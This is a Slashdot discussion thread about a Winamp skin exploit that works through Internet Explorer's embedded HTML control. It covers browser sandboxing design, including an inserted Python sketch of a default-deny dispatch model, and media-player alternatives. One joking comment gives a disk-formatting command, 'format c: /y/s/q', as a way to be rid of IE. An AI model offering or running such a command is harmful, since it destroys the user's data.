      So, to sum up:
      1) iTunes installs services needed for features you don't intend to use, such as iPod support and CD burning
      2) QuickTime puts an icon in the systray, which is easy to disable
      3) QuickTime drops a movie on your desktop and nags about paying $30 when you launch QuickTime Player, which sucks ass, but isn't an issue if all you're using is iTunes.

      So yeah, those are some legitimate complaints. Did you have any others?

      By the way, on Mac OS X, iTunes doesn't run those extra services (because they're handled by the OS itself), and doesn't install QuickTime (because it's already installed), and QuickTime doesn't put an icon in the systray (because that's... retarded).

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  28. Crazy by ddod · · Score: 0, Redundant

    Just one more reason why I have ceased to use Internet Explorer for just about anything. Firefox all the way!!

    It's no hoax. I normally don't go for these things but...Free ipods rock

  29. Winamp 2.81 Rules! by Anonymous Coward · · Score: 0

    They haven't added anything good to any new version of WinAmp since 2.81 - I used to run 2.81 on my P133 and it was great. Try running the new versions of winamp on a P133, and all of a sudden your computer isn't fast enough.

  30. Skin(ny) dipping? by davidsyes · · Score: 0, Flamebait

    If WinAmp doesn't release or realize a worthy fix, they could be dipping their skin in an arcing, amping, electric fryer if the exploits get out of control.

    (Hmm, fixes, amping, arcing...)

    --
    Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
    1. Re:Skin(ny) dipping? by davidsyes · · Score: 1

      COME now, chap...

      Flamebait?

      Sigh...

      --
      Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
  31. Skinning is Worth It by Anonymous Coward · · Score: 5, Funny
    Having to periodically wipe your system and reinstall from backups is a small price to pay for the ability to have your apps look like real equipment.

    I mean, WinAmp can actually look like different kinds of real CD players! Can you believe that? It can look like all sorts of things; it doesn't have to look like a rectangular window at all. That just rocks! You can even change the way it looks at runtime! You can download whole new looks! Man, that is too cool.

    Kudos to those guys. This is the kind of thing that really makes computing fun.

    1. Re:Skinning is Worth It by maduro55 · · Score: 0

      "having to periodically wipe your system and reinstall... is a small price to pay..." Are you smoking crack? This is obviously a TROLL.

    2. Re:Skinning is Worth It by caino59 · · Score: 1

      most insightfully humorous comment of the day.

    3. Re:Skinning is Worth It by bbowman0 · · Score: 1

      it doesn't have to look like a rectangular window at all. That just rocks!

      Big deal, K-Jofol had that nearly a decade ago.

      --

      One Nation:
      Under God
      Under Allah
      Under Zeus
      Under Satan

      OR

      One Nation Indivisible
    4. Re:Skinning is Worth It by talaphid · · Score: 1

      I don't understand what's so hot about this whole 'sound synthesis' process you kids are talking about. Me, I put in my vinyl, and then output the pits and grooves as text on the screen with C/PMamp... 010100000101010111010101... oh, yes, that's the really soothing introduction to Beethoven's 3rd.

    5. Re:Skinning is Worth It by LoadWB · · Score: 1
      WinAmp can actually look like different kinds of real CD players!
      I get a chuckle out of programs that are made to resemble real articles. Not that it is a bad thing, I just think sometimes we go over-board, like with games. I am waiting for the day a 3D game is advertised as "so real, it's like you got your lazy ass up off the couch and really played the actual game it simulates!"
    6. Re:Skinning is Worth It by Anonymous Coward · · Score: 0

      You mean like Dance Dance Revolution?

      "So real you may actually get some exercise"

    7. Re:Skinning is Worth It by whyde · · Score: 1

      Making software look like a real piece of hardware is only useful if you normally walk up to your CD player and press its buttons with the backside of your mouse.

      They should stick with interfaces which are easy to manipulate with today's common computer input devices, instead of pretending you really had a touch-responsive dataglove on at all times.

      "No matter how cool your interface is, less of it would be better." --Alan Cooper

  32. Yes by Anonymous Coward · · Score: 0

    Yes you are

  33. Fixed in betas! by oliverjms · · Score: 1, Informative

    Check out www.winampunlimited.com for more details

    1. Re:Fixed in betas! by Anonymous Coward · · Score: 0

      oli, i am responding to your post because it looked lonely--all hanging around with no replies or points. nice link though.

    2. Re:Fixed in betas! by oliverjms · · Score: 0

      I also believe mlipod.sf.net need a plug?

  34. things to say by XO · · Score: 3, Insightful

    Just to comment on all the first 11 posts I see here:

    (1) I've not used WinAmp in many years [like i've not used Windows in many years], but when secunia says the advised course of action is "use another product", i'm guessing that that probably means this feature can not be disabled, or at least not easily? or if it can be, then its disabling can also be circumvented?

    (2) Absolutely right, having a component of the system that is active to ALL programs, whether it wants it or not, is inviting the most bizarre of security holes. Of course, the WinAmp people probably should come up with a better, more secure transport method for getting their skins around, but it's not really their fault that IE is a pile of crap security wise.

    (3) what kinda genius would figure out that you could embed an xml file, with instructions to run a specific executable file, within a zipped skin file, and then manage to trigger a security hole in a web-browser module that really shouldn't have a damn thing to do involved with the program that you're sending this virus through? The people who are BREAKING the security I figure have got to be infinitely more intelligent than the people who are CREATING the security.. or at least a whole hell of a lot more creative..

    i really can't imagine that anyone could be thinking, when they write a program like this, "oh, what if someone tries to take advantage of such and such known security flaw in this way through our program, even though they don't have jack and shit to do with each other?" ..

    obviously, you're going to try to cover in advance for security things, but who could predict an attack in such a convoluted fashion?

    --
    "Champagne for my real friends - and real pain for my sham friends!" http://ericblade.postalboard.com/
    1. Re:things to say by gershbaz · · Score: 3, Insightful

      The whole point of good/secure coding is not anticipating attacks, but just making sure that the program can't do anything *except* what it's supposed to. "Integration" unless it's done with secure clear protocols is the source of nearly every security hole for windows.

    2. Re:things to say by Anonymous Coward · · Score: 0
      I've not used WinAmp in many years [like i've not used Windows in many years], but when secunia says the advised course of action is "use another product", i'm guessing that that probably means this feature can not be disabled, or at least not easily? or if it can be, then its disabling can also be circumvented?
      Secunia must've really been lazy at the time to have just suggested to "use another product." There have been several ways one can safeguard their system from this exploit that have been posted either in this discussion and on Winamp Unlimited.

      Besides, if the alternative is iTunes, I'd much much rather take my chances with Winamp.
    3. Re:things to say by maximilln · · Score: 2, Insightful

      or at least a whole hell of a lot more creative

      That's precisely what this is. It's like checking for secret doors in a dungeon in an old RPG like Bard's Tale. One step forward, check right, check left. One step forward, check right, check left. Repeat until you find an opening.

      This sort of thing could very easily affect Linux as well. As much as I love Linux I've been waiting for someone to spring something like this through Mozilla. It's only a matter of time before someone figures it out.

      --
      +++ATHZ 99:5:80
    4. Re:things to say by Ced_Ex · · Score: 1

      Whole lot easier to break something than it is to create something.

      Particularly when you have that something in front of you and you can analyze it to death. Which is why you don't see exploits of things yet to be created. :)

      --
      Live forever, or die trying.
    5. Re:things to say by drinkypoo · · Score: 3, Informative

      It is possible to easily fix this problem.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  35. Assistance for the clueless by Anonymous Coward · · Score: 1, Insightful

    I'm an idiot--I don't get it. Can anybody help?

    1. Re:Assistance for the clueless by gwernol · · Score: 5, Informative

      I'm an idiot--I don't get it. Can anybody help?

      Flensing means to remove the skin from something.

      --
      Sailing over the event horizon
  36. Skinny Dipping by t_allardyce · · Score: 2, Insightful

    Is there any way to actually uninstall IE or at least make it absolutely not the default browser and ban its execution or engine use by all other programs and perhaps replace that engine with something else? Considering that was part of a big law-suit surely there's a way? In fact I need IE installed for website testing so the second option would be best.. all I can think of is setting the permissions of the engine dll and IE executables but replacing it would be nice too..

    --
    This comment does not represent the views or opinions of the user.
    1. Re:Skinny Dipping by MrNemesis · · Score: 4, Informative

      Yes.

      http://http//www.crackbaby.com/article.php?sid=100 93

      Not tried it myself yet, but it replaces all calls to IE with calls to the browser of your choice.

      --
      Moderation Total: -1 Troll, +3 Goat
    2. Re:Skinny Dipping by MrNemesis · · Score: 1

      Crapola, should have used the preview...

      http://www.crackbaby.com/article.php?sid=10093

      --
      Moderation Total: -1 Troll, +3 Goat
    3. Re:Skinny Dipping by t_allardyce · · Score: 1

      Sweet, now all we need is a simple utility for rapid deployment..

      --
      This comment does not represent the views or opinions of the user.
    4. Re:Skinny Dipping by DarkMantle · · Score: 1
      No... considering iexplore.exe and explorer.exe use the same .dll files to handle known extensions. If you open windows explorer, or My Computer, and type a web address in the address bar, you get the IE look and feel without a new window, or waiting for iexplore to load.

      Essentially the point I'm trying to make is the only way to remove Internet Explorer is to type
      format c: /y/s/q
      into dos and then install Linux, BSD, Darwin, or if you want to stay with windows, you could install windows 95 or older, but don't update IE to version 4.0 or higher.
      --
      DarkMantle I been bored, so I started a blog.
    5. Re:Skinny Dipping by Anonymous Coward · · Score: 0

      link completely broken at this point. redirects to microsoft.com of all things.

    6. Re:Skinny Dipping by t_allardyce · · Score: 1

      So what was the outcome of that law-suit that said Microsoft should make IE separable from Windows?

      --
      This comment does not represent the views or opinions of the user.
    7. Re:Skinny Dipping by traveyes · · Score: 1

      weird... in firefox that link takes ya to microsoft.com....

      here's the correct link.

      .

    8. Re:Skinny Dipping by Anonymous Coward · · Score: 0

      No it doesn't. You must be using IE or something.

    9. Re:Skinny Dipping by DarkMantle · · Score: 1

      The next version it's supposed to be implemented. For now the courts are happy that you can hide IE in favor of another browser.

      --
      DarkMantle I been bored, so I started a blog.
    10. Re:Skinny Dipping by Anonymous Coward · · Score: 0

      This is not a very good method. It leaves the code on your system, and I wouldn't trust NT to really respect those permissions when stuff is hardwired to want to use it. Try LitePC instead and actually keep the shit off your system.

    11. Re:Skinny Dipping by DNS-and-BIND · · Score: 1

      A new worm?

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  37. Same skin for... by Moonlapse · · Score: 1

    I've been using the same skin on Winamp 2.8 for years (plug for 'Silence' skin). Maybe that's because it's part of my disk image I always wind up going back to.....

    --
    - I got my free iPod and a free Nintendo DS....why not
  38. Expect these to grow more common... by hanssprudel · · Score: 5, Interesting


    Now that people have started to use firewalls, and the risk of worms and rootkits that infect through open, exploitable, holes grows smaller, it is time to expect more and more exploits to follow alternative vectors.

    Note how many buffer-overflow exploits there have been in server daemons. Well, there is no reason to believe that servers are any worse written with regards to input than client applications - quite the contrary actually.

    People think they are safe with a firewall. But I'm willing to bet there are undiscovered exploits in just about every application they run. WinZip? WinAMP? Acrobat Reader? Media player? Anything that handles files received over the Internet is potentially a vector for viruses and possibly worms.

    This time it was bad escaping, which made the exploit trivial, but there a buffer overflow would have served just as well. Neither firewalls nor anti-virus software will protect you.

  39. Solution: use another product. by farlcow · · Score: 0

    Patient: "Doc, it hurts when I do this" Doctor: "Then don't do that"

  40. Summary of article summary by MobyDisk · · Score: 1, Redundant

    Yet another unwanted, unnecessary feature involving Internet Explorer embedded into a program that doesn't need it has a remote exploit. To mitigate this problem, disable active anything, automatic anything, and ActiveX anything. That is all.

    1. Re:Summary of article summary by Anonymous Coward · · Score: 0

      This feature is also available on FireFox.

  41. Dumb Question by ewhac · · Score: 5, Interesting

    For what possible purpose does a skin -- which is essentially nothing more than graphical elements -- need to invoke the browser?

    WTF? Seriously, help me out here. I've only been a programmer for 25 years, so I may not understand the deeply compelling reasons driving such a design decision.

    Schwab

    1. Re:Dumb Question by Pedrostolemaburrito · · Score: 2, Informative

      I am supposing that invoking the browser is a side-effect of the mini-browser bundled with Winamp since 2.x and the skin applies to it also. If it isn't bad enough to have multiple browser windows open (for the sorry buggers not using tabbed browsing on decent browsers), we can also browse the internet right in Winamp...woohoo!

    2. Re:Dumb Question by argent · · Score: 4, Informative

      A skin invokes the browser because Microsoft's got this tasty-looking rich-text, GUI, and graphics layout and rendering engine that they decided about seven years ago needed to be a core part of the OS. Which is all well and good, but it's not just a rich-text rendering engine, it's pretty much all of Internet Explorer but the window decorations and preferences utility.

      They did this not because it's a good idea for every application to have internet access and rich scripting with only a token sandbox about the potentially untrusted data they're displaying, but because they wanted to keep the DoJ from forcing them to compete with other companies that were producing web browsers.

      My response at the time was to ban the use of IE, Outlook, and any other application that I could think of or that I found out about that was using this component to view untrusted documents. Well, I didn't ban them directly, I talked our CEO into it. I figured that most IT administrators and managers would do the same, because this was obviously just asking for trouble (I didn't know what trouble it would cause, but I knew it was asking for it). Then, when Melissa hit a little while later, I figured THAT would finally be enough to get people to ban these "typhoid mary" applications. I mean, anyone could tell this was doomed.

      Boy, was I naive. I forgot that people who haven't worked on computer security aren't nearly paranoid enough. I expect that on the 10th anniversary of the integration of IE with the desktop people will still believe Microsoft when they say they're serious about security this time.

      And I never would have imagined that Apple would follow suit and use the same LaunchServices for local applications opening things like help files and for web browsers to run plugins, helper apps, and so on...

      For the love of god, people, get on the horn to Microsoft, and Apple, and the folks at Mozilla.org who are still using these inherently broken APIs themselves (yes, Firefox has been demonstrated to respond to a couple of the same exploits). Tell them that ENOUGH is ENOUGH. You can't fix this with better heuristics, you can only fix it by making the sandbox unconditional... separate the display code and the access code and give each application a choice of bindings (at the VERY least, 'this is the binding for trusted documents, this is the binding for untrusted documents, and this is the binding for you specifically').

    3. Re:Dumb Question by Anonymous Coward · · Score: 0

      I don't know why is this modded informative. Anything that bashes Microsoft becomes insightful I believe. The question was why is the skin launching the browser? And you respond saying how MS added the core of IE to OS? Insightful..eh?

      Is the xml in the skin zip, being parsed by any of MS's code? (literally, they might be using MS API. But again i am digressing). It's entirely winamp's codebase that is actually parsing the xml and launching the browser on encountering the browser tag. come to think of it did you RTA?

      Anyway I am not sure this post will be seen. I know the secret to get modded insightful..

      Here it is:
      M$ Windoze su**s

    4. Re:Dumb Question by Anonymous Coward · · Score: 0

      He answered the question and expounded on the topic. Just because it didn't fit your ideological zealotry doesn't make it a bad post.

    5. Re:Dumb Question by Anonymous Coward · · Score: 0

      oh yes..he answered the question but did the answer really make sense:

      I ask my friend why did you crash the car?. My friend goes "well. i can accelerate fast and can turn my wheel to hit a car?". Well just 'cause you can invoke a browser doesn't mean every damn app has to invoke it and blame it on MS embedding it in OS.

      If you looked at the question in the parent post, of the post in concern he really mentioned it in a way what is the need to invoke a browser from a skin.

      just because someone expounds on a topic and playing blame game without substantial evidence, doesn't mean that the reply in the post is really an answer or is it?

    6. Re:Dumb Question by argent · · Score: 1

      I wasn't "bashing Microsoft", mister "anonymous coward". I was pointing out a deep design flaw in a specific Microsoft product, and explaining why it was there. I pointed out that Apple, in Safari, and Firefox under both Mac OS and Windows, have the same problem... you gonna complain I should be modded up or down because I "bashed" some of the "good guys" as well?

      Is the XML being parsed by MS' code? IT DOESN'T MATTER. Firefox is parsing its own HTML, but it's using the Microsoft-provided application bindings, bindings that are the result of applications registering as handlers for desktop objects (Hi! I'm the handler for Word documents! Hi! I'm the handler for HTML documents! Hi! When a user clicks on a screen saver icon, RUN ME!). These bindings are simply NOT APPROPRIATE for use by untrusted objects. Any object that would not be normally expected to have full local user rights .. documents downloaded from the net, remote web servers, data files like PDFs and skins .. should not be granted access to the same set of application bindings as local files.

      When an application sees a tag, or a mime type, or anything else, that says "hi, I'm an HTML document", or "I'm a pointer to an HTML document", what does it do? Well, Microsoft's API says "pass this to what the user has selected as an HTML document handler (that is, their default browser)".

      Now, if their default browser is one of the browsers that's inherently sandboxed, then you've still got multiple layers of protection between you and the exploit. Mozilla won't give a file loaded from the local disk any more rights than a file loaded from hackers-r-us.com.

      But if your default browser is Internet Explorer, you've just asked Internet Explorer to open a file from the local disk. And Internet Explorer sees that it's a local file, and does a quick costume change, and becomes Windows Explorer (because the only difference between the HTML control loaded from Internet Explorer and the HTML control opened from any other application is a thin shell that doesn't actually have any control over what the browser is actually doing), and Windows Explorer is the Superbrowser. When a document is being displayed by Windows Explorer, it can do anything that Windows Explorer can. Which is anything the user has the rights for.

      This is a problem.

      Over on the Pocket PC, Microsoft has a program called Pocket Internet Explorer. It's a much simpler program than IE, and I don't know if it has any code in common with IE, but it has a big advantage over IE. And that is, it's just another program. It can't turn into Superbrowser. So this transformation isn't something baked into the idea of a browser.

      There's a LOT of good browsers you can run under Windows, and Windows is a pretty good desktop environment if you're careful to avoid the whole Internet Explorer / Outlook trap. Go ahead and use them.

      BUT...

      Again, as I said, get on the horn to people like Apple and the Mozilla organization, because they're being stupid too. Let them know you don't want this kind of design spreading. Let the folks at mozilla.org, even, know you *like* Windows, that you *want to use* Windows, but they can't assume that the Windows API for launching a helper application is something that should be trusted with random unknown content, any more than the API for installing a service or running a program is. It's not designed for that, it's continually patched by Microsoft to try and make it safe, but the fundamental nature of the beast is that it's not possible to use that kind of API in that way safely.

      This is not "bashing Microsoft", or if it is it's bashing Apple, Mozilla.org, and probably KDE as well because Konqueror has some kind of desktop integration that may also end up with the same problem.

    7. Re:Dumb Question by Anonymous Coward · · Score: 0

      exactly. you are kind of making my point get across easier.

      just like how you point out MS does not need to integrate every damn thing into Explorer, like opening a local file from network browser and vice versa, I don't see any reason why a skin's xml needs to have an ability to mention to open a browser.

      So instead of pointing fingers at MS alone on this, let's give some credit to winamp ppl for giving us the ability to open a browser from a skin

    8. Re:Dumb Question by argent · · Score: 1

      don't see any reason why a skin's xml needs to have an ability to mention to open a browser

      They don't, if you do all the rendering and layout yourself. But IF you use Microsoft's rendering API to display rich content, which is one of those features of Windows that Microsoft is proud of, then it's pretty much impossible to keep it from opening a browser when there's a command to open a browser in that content.

      I know, I worked on it, and got some of our top Windows geeks to work on it. If you use Microsoft's HTML control, you are using the browser. There's no way around it.

    9. Re:Dumb Question by argent · · Score: 1

      I ask my friend why did you crash the car? My friend goes...

      ... your friend goes "if I use the controls that the manufacturer provided, then every now and then the accelerator just goes flat out and there's nothing I can do about it. The only way to keep it from happening is to open the hood and lean out the window and tug on that lever in the engine *there* to control the accelerator. If you do that, then it's perfectly safe so long as you're good at steering with your feet."

      And you go "Well, I guess that's the way you have to drive the car, then. Why don't you tie this rope to the accelerator control and tug on that to steer."

      And your friend goes, "Yeh, now that I've crashed the car, I know better. But don't you think they should make controls that work?"

      And you're going. "Yeh, but it's still partly your fault for trying to drive the car like the manufacturer suggests." And I'm going "what the hell are you smoking?"

      Except that somehow (and this is something else I said, which you seem to have missed) people don't say "I know better", they say "Damn, I guess Microsoft really has to fix the controls this time, they've only been crashing cars for seven years."

      Which is psycho.

  42. Mac + Microsoft = Good for users and business by Anonymous Coward · · Score: 0


    "We have to let go of a few things here. We have to let go of the notion that for Apple to win, Microsoft has to lose," Jobs told the crowd



    But admitted cynical, long-time Mac fans said that the Microsoft investment in Apple has been a good thing for the company.



    "And Microsoft products for the Mac can be better than software from other companies that run on the Mac, like Netscape Navigator -- I think Explorer is more stable on the Mac than Navigator,"


    Microsoft makes good software for Apple computers, let's give credit where credit is due.

  43. winamp skin by Anonymous Coward · · Score: 0

    I use a winamp skin in xmms, I hope I'm not susceptible to this attack. Your thoughts?

    1. Re:winamp skin by Doug+Lim · · Score: 2, Insightful

      I'd bet it's probably not an issue for xmms using winamp skins. I don't believe it's a problem with winamp per se. I believe it's due to winamp's integration with IE.

      It's really annoying that IE integration can't be disabled or if it's even possible to integrate with another browser.

      I don't know exactly how it works, but certain streams will pop open the Winamp browser window to the stream's home page and the stream's home page has popups.

      In fact, due to integration with IE, even if you don't use IE for any browsing, someone could set up an enticing stream (**cough**pr0n**cough) and infect a lot of people with malware who think they're safe because they never websurf with IE.

    2. Re:winamp skin by maximilln · · Score: 1

      I believe it's due to winamp's integration with IE

      It's because Winamp uses XML to parse skin archives which allows hotlinking to untrusted locations.

      Now, if we could get rid of this crack-like addiction to one-click computing, the skin file would have a README which would tell the user to copy the files to the appropriate location. While the majority of users would blissfully copy the .exe along with the rest at least it wouldn't be executed.

      Of course, then there'd be a web-page someplace with a link just to check to see if the skin had been installed in a default location with the .exe intact. It's a distributed approach to chipping away at security. This is the same thing that happens to people who install dozens of "cuteware" apps. Each one breaks something else a little more until eventually there's a hole in the system.

      --
      +++ATHZ 99:5:80
  44. haven't used WinAmp in 5 years. by cetan · · Score: 1

    That's why I use QCD:

    http://www.quinnware.com

    --
    In Soviet Russia...michael would be rotting in Siberia!
  45. Re:School must've just gotten out. by machine+of+god · · Score: 4, Funny

    I notice the average vocabularical IQ drops about 50 points once 3pm EST hits.

    vocabularical.

    I believe you were saying something?

  46. revenge by bersl2 · · Score: 4, Funny

    I'm pretty sure the llama is tired of getting its ass whipped.

  47. How to fix IE, Safari, and everything else... by argent · · Score: 4, Insightful

    ANY library that works like the Microsoft HTML control (this is what Microsoft calls all the non-trivial bits of Internet Explorer... the IE application is just a thin wrapper around this) is at risk for exploitation. The only way to be sure that nobody's going to break out of your sandbox is to make sure that the application that creates the sandbox is the application that controls access from the sandbox, and that any helper applications it calls unconditionally implement their own sandboxes.

    If you use the *same* application, API, or application binding (eg, the file type bindings used by the desktop and the MS HTML control, or Apple's LaunchServices) for both sandboxed and trusted objects, then you open up the possibility that an untrusted object will look like a trusted object, or that an untrusted object will be passed to a handler that isn't inherently safe.

    Apple blew this with LaunchServices, and they still haven't really fixed the underlying problem. But they've only been in denial a few months, whereas Microsoft has been in denial about this for seven years, so let's look at Microsoft...

    Let's suppose the HTML control was split up, so it only did rendering. Whenever it wanted to open a file, open a URL, run a script, load a plug-in, it would ask the parent application "what do I do about a CHM file" or "what do I do about <script language=vbscript>". You'd have an "HTML-only control" and a "Web Access control" and IE would be a very slightly thicker wrapper around both.

    So then you register "Word Viewer"[1] with Outlook and IE as the helper application for Word documents, and "Word" with Windows Explorer as the helper application for trusted Word documents. If this was done, then Outlook (which would be a sandboxing application in this model) would open "Word Viewer" for untrusted documents.

    Voilà, no more email-spread Word macro viruses.

    Similarly, Outlook would decline to run VBscript, and IE would decline to run the Windows Update plugin... you'd have a Windows Update program that was a thin shell around the HTML-only control... one that only opened windows update.

    Microsoft could have their cake and eat it too, and EVERYONE would have a more secure and less spammy environment.
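
The split proposed in the comment above, modelled as an added example (it is not from the original post and uses no real Windows or Outlook API). The names `Request`, `Host`, `render_shared` and `render_split`, the binding table and the sample mail are constructed for illustration; that the trusted shell runs VBScript is an assumption.

```python
from dataclasses import dataclass, field

# "Before": one desktop binding table consulted for every object,
# wherever it came from (constructed sample values).
DESKTOP_BINDINGS = {
    "doc": "Word",
    "html": "default browser",
    "scr": "screen saver executable",
}


@dataclass(frozen=True)
class Request:
    """What rendered content asks for. There is deliberately no trust
    field: content cannot declare itself trusted."""
    kind: str     # "open" (helper for a file type) or "script"
    subtype: str  # file extension, or script language


@dataclass
class Host:
    """Application embedding the rendering-only control. It owns the policy."""
    name: str
    helpers: dict = field(default_factory=dict)  # extension -> helper app
    script_languages: frozenset = frozenset()

    def decide(self, req: Request) -> str:
        if req.kind == "open" and req.subtype in self.helpers:
            return "launch " + self.helpers[req.subtype]
        if req.kind == "script" and req.subtype in self.script_languages:
            return "run " + req.subtype
        return "refuse"  # default deny: anything unregistered is declined


def render_shared(requests):
    """Shared-binding design: the control resolves everything itself."""
    results = []
    for req in requests:
        if req.kind == "open":
            helper = DESKTOP_BINDINGS.get(req.subtype)
            results.append("launch " + helper if helper else "refuse")
        else:
            results.append("run " + req.subtype)
    return results


def render_split(host, requests):
    """Split design: the control only renders and asks its host each time."""
    return [host.decide(req) for req in requests]


# Sandboxing host: its own helper table, no script languages at all.
OUTLOOK = Host("Outlook", helpers={"doc": "Word Viewer"})
# Trusted shell: keeps the full desktop bindings (VBScript is an assumption).
EXPLORER = Host("Windows Explorer", helpers=dict(DESKTOP_BINDINGS),
                script_languages=frozenset({"vbscript"}))

# Constructed untrusted mail: a Word attachment, an embedded script, a .scr.
MAIL = [Request("open", "doc"), Request("script", "vbscript"),
        Request("open", "scr")]

if __name__ == "__main__":
    print("shared bindings:", render_shared(MAIL))
    print("Outlook as host:", render_split(OUTLOOK, MAIL))
    print("Explorer as host:", render_split(EXPLORER, [Request("open", "doc")]))
```

The same `.doc` request reaches Word only when the trusted shell is the one asking; under the sandboxing host it reaches Word Viewer, and the script and `.scr` requests are refused because that host never registered them.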

  48. Winamp 2.xx..... by darth_silliarse · · Score: 0, Flamebait

    ...is not affected and us sensible users browse with Mozilla/Opera/NotIE as the default so what's the big deal? Who the fuck uses the crappy bloated recourse hog that is 5.x anyway.... ah Internet Explorer users. Bless their cotton socks.... MORE TOOLBARS AND GATOR APPZ AND SKINZ PLEEZE. Makes life worth living watching an Internet Explorer user suffer!

    --
    I've noticed that everyone who is for abortion has already been born - Ronald Reagan
    1. Re:Winamp 2.xx..... by CritterNYC · · Score: 4, Informative

      Who the fuck uses the crappy bloated recourse hog that is 5.x anyway.... ah Internet Explorer users.

      5.x playing in the background using 0% CPU and under 6mb of RAM... about what 2.x uses... with a feature-set comparable to iTunes without the huge iTunes resource overhead, 3 installed services, etc, etc. A "lightweight" media player like foobar2000 is ~1% CPU and 11mb RAM.

    2. Re:Winamp 2.xx..... by Anonymous Coward · · Score: 0

      My only recourse is to not use such a resource hog.

    3. Re:Winamp 2.xx..... by Anonymous Coward · · Score: 0

      Yet the Winamp 5.x user interface is slower and less responsive than 2.x.

    4. Re:Winamp 2.xx..... by chickenmonger · · Score: 1

      Winamp only seems to use that much memory if you have a large playlist. If you just double click to play the files you want to play, having only one song in the playlist at a time, the memory use is much lower. Perhaps somewhere around 2 or 3 MB.

    5. Re:Winamp 2.xx..... by Anonymous Coward · · Score: 0

      IMHO foobar2k is going beyond "lightweight" .
      for minimal usage I'm using 1by1 - never goes beyond 3-4mb Ram. :)

      http://www.uni-frankfurt.de/~pesch/#1by1/

    6. Re:Winamp 2.xx..... by AnyoneEB · · Score: 1

      Oh? Seems to be pretty much identical in responsiveness and appearance to me. Or did you install that awful thing called "modern skin support"?

      --
      Centralization breaks the internet.
    7. Re:Winamp 2.xx..... by Anonymous Coward · · Score: 0

      Thanks for your completely meaningless and unverifiable statistics.

      using 0% CPU

      Can you give that to me in instructions per second? Or at least CPU cycles per second (usage * clock rate) and processor class?

      under 6mb of RAM

      With how large of a playlist? And how many plugins installed and running?

      Foobar takes ~35 million processor cycles per second on a P3 during playback. Running minimized with a total of ~1,500 songs in its playlists it has about a 2.5MB working set.

    8. Re:Winamp 2.xx..... by CritterNYC · · Score: 1

      Thanks for your completely meaningless and unverifiable statistics.

      using 0% CPU

      Can you give that to me in instructions per second? Or at least CPU cycles per second (usage * clock rate) and processor class?

      Since the usage is zero (below what Task Manager can measure), it can't be calculated without using another measurement tool, which I don't have installed. It's running on an AMD 64 3200+.

      under 6mb of RAM

      With how large of a playlist? And how many plugins installed and running?

      1 song (same song) in the playlist on winamp and foobar, no plugins. We're talking base installs here, which is always assumed unless otherwise specified.

      Foobar takes ~35 million processor cycles per second on a P3 during playback. Running minimized with a total of ~1,500 songs in its playlists it has about a 2.5MB working set.

      Interesting, considering my fresh download/install of the latest version consumes 11mb with just that 1 song in its playlist. Oh, and all numbers are what it settles at (both players consume more CPU/RAM when launching a song).

  49. Uh... footnote I forgot... by argent · · Score: 1

    [1] I'm assuming that Word Viewer does not implement Word macros. It doesn't seem to, but if I'm wrong about this then (since we're in a hypothetical world) let's assume there's a version that doesn't.

  50. old.... by syncore · · Score: 1

    This exploit was discovered about 4 months ago :-/

  51. More support for JWZ's audiocock technology. by argent · · Score: 1

    Yet another reason that skinnable apps are evil.

  52. Super-simple MP3 Player by Dracolytch · · Score: 1

    Since we're on the topic. Does anyone know of a super-small/simple MP3 player that just plays from my system tray?

    I want a music player that has no skins, no visualizations, just a small program that keeps track of a playlist, plays music, and stays out of my way.

    ~D

    --
    This sig has been enciphered with a one-time pad. It could say almost anything.
    1. Re:Super-simple MP3 Player by Animats · · Score: 2, Informative
      Try Freeamp/Zinf, the open source replacement for Winamp.

      Of course, they had to put in "themes", but at least it doesn't download them itself.

    2. Re:Super-simple MP3 Player by Anonymous Coward · · Score: 0
    3. Re:Super-simple MP3 Player by Kurrurrin · · Score: 4, Informative

      Foobar does
      http://www.foobar2000.org/
      Handy, simple, small, and will go straight to the system tray.

      --
      -Doug
    4. Re:Super-simple MP3 Player by Anonymous Coward · · Score: 0

      Winamp Lite 5. The installer is less than 1MiB.

  53. iPodService.exe by Anonymous Coward · · Score: 0

    Cuz you CANT LOOK BACK !!!!

    iPodService.exe which Apple gratuitously installed when I tried to upgrade my Quicktime, won't quit.
    TaskManager/Select iPodService.exe/End Process and I get a message that says Access denied.

    Thanks Steve Jobs !!!!

    Thanks for giving me something I didn't ask for.

    Thanks for making it so that it doesn't respond to "End Process" commands.

    Thanks!

    1. Re:iPodService.exe by feroxy · · Score: 1

      type "services.msc" into run, look for "ipod service" in the list, double click and set startup to disabled. sorted.

    2. Re:iPodService.exe by ChoGGi · · Score: 1

      you can end any task with this
      http://www.diamondcs.com.au/index.php?page=taskman

  54. Re:use firefox by strictfoo · · Score: 0, Flamebait
    that was the ugliest attempt at trying to create a link in the history of mankind. It was horrible on two levels.

    1. You don't know how to create a link using either the slashdot <URL:> tag or a standard anchor tag.

    2. The link you posted redirects to a specific file, so why not just link to that? http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/0.9.3/FirefoxSetup-0.9.3.exe
    --
    I've just signed legislation that'll outlaw Russia forever. We'll begin bombing in five minutes.
  55. might want to release that patch... by uodeltasig · · Score: 1, Interesting

    Since the forum basically gives step-by-step instructions of how to recreate the exploit they might want to release the patch sooner or edit the forum post so that happy script-kiddies have to do a little more work than copying and pasting to exploit it... Meanwhile, switch to linux and use XMMS :)

    --
    Hey look no pointless curley braces or semicolons... just like Python
    1. Re:might want to release that patch... by Anonymous Coward · · Score: 0

      Correct me if I'm wrong but doesn't XMMS use Winamp skins or at least it did the last time I used that crashing piece of shit.

    2. Re:might want to release that patch... by uodeltasig · · Score: 1

      XMMS has the ability to load winamp skins, but doesn't auto-install/launch/set-it-as-default like winamp does. I personally say XMMS has the better approach, this situation is a great case for that... if I click a picture and get a XMMS/Winamp skin I prob. won't download and install it... I understand why people are getting defensive about winamp as it's a great product, but since when did people start siding/defending M$... "...I'm using Windows, and so XMMS is not an option." (your mistakes are emphasized by me) "Why would I change my entire operating system..." Why would you want to open your system up to infinite amount of security holes? Who knows... I thought ./ blocked all the *.microsoft.com posters, if not they should.

      --
      Hey look no pointless curley braces or semicolons... just like Python
  56. Re:School must've just gotten out. by TaintedPastry · · Score: 1

    :-p

  57. Dumb Answer by Iscariot_ · · Score: 2, Interesting

